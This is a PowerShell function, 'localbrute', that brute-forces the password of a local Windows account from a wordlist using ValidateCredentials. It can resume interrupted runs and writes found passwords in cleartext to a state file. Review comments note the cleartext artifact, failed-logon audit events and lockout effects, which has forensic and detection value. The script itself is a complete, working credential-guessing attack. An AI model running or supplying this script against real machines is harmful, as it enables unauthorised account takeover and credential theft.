Function localbrute {
<#
.SYNOPSIS
Tests candidate passwords from a wordlist against one local account and
records progress in .\localbrute.state.

.PARAMETER u
Name of the local account whose credentials are validated.

.PARAMETER dct
Path to the wordlist file, read one candidate per line.

.PARAMETER debug
When truthy, prints the resume position and every candidate as it is tried.

.NOTES
State file format (one record per line, colon-separated, appended in the
current directory):
    <user>:<wordlist file name>:<line counter>:<last candidate>   progress record
    <user>:<wordlist file name>:True:<password>                   success record
Both record types hold candidates in cleartext, so the file is a
credential-bearing artifact for forensics and cleanup. Fields are split on
":" with no escaping, so a candidate containing ":" spans several fields.

NOTE(review): each rejected ValidateCredentials call is expected to appear as a
failed-logon audit event (typically Security Event ID 4625) when logon auditing
is enabled, and to count toward any configured account lockout threshold.
Confirm on the target OS build.
#>
param($u,$dct,$debug)
# Reduce the wordlist path to its file name: drop everything up to the last "\" and then the last "/".
$d = $dct -replace ".*\\" -replace ".*/"
# Suppress non-terminating errors for the rest of the function (for example, a state file that does not exist yet).
$ErrorActionPreference = "SilentlyContinue"
# Look for a success record for this user and take field 3, the stored password.
# $u is interpolated into the regex unescaped, so regex metacharacters in the name change the match.
$i = ((gc .\localbrute.state | sls "^${u}:.*:True:.*") -split(":"))[3]
if ($i) {
echo "Password for $u account already found: $i"
return
}
# Take the most recent progress record for this user and wordlist.
$ii = (gc .\localbrute.state | sls "^${u}:${d}:" | select -last 1) -split(":")
# Dividing by 1 coerces the stored counter to a number; with no prior record this is expected to yield 0.
$i = $ii[2]/1
if ($debug) {echo "DEBUG: starting $d from $i"}
try {
Add-Type -AssemblyName System.DirectoryServices.AccountManagement
# ContextType::Machine validates against the local machine's account store, not a domain.
$t = [DirectoryServices.AccountManagement.ContextType]::Machine
$a = [DirectoryServices.AccountManagement.PrincipalContext]::new($t)
# ReadCount is the 1-based line number Get-Content attaches to each line; lines at or below the saved counter are skipped.
foreach($p in (gc $dct|where {$_.readcount -gt $i})) {
if ($debug) {echo "DEBUG: trying password [${i}]: $p"}
if ($a.ValidateCredentials($u,$p)) {
# Success record: the validated password is appended to the state file in cleartext.
echo "${u}:${d}:True:${p}" >>localbrute.state
echo "Password for $u account found: $p"
return
}
$i++
}
} finally {
# Runs on every exit from the try block, including the return after a success,
# so a progress record with the last candidate is appended in cleartext each run.
echo "${u}:${d}:${i}:${p}" >>localbrute.state
}
}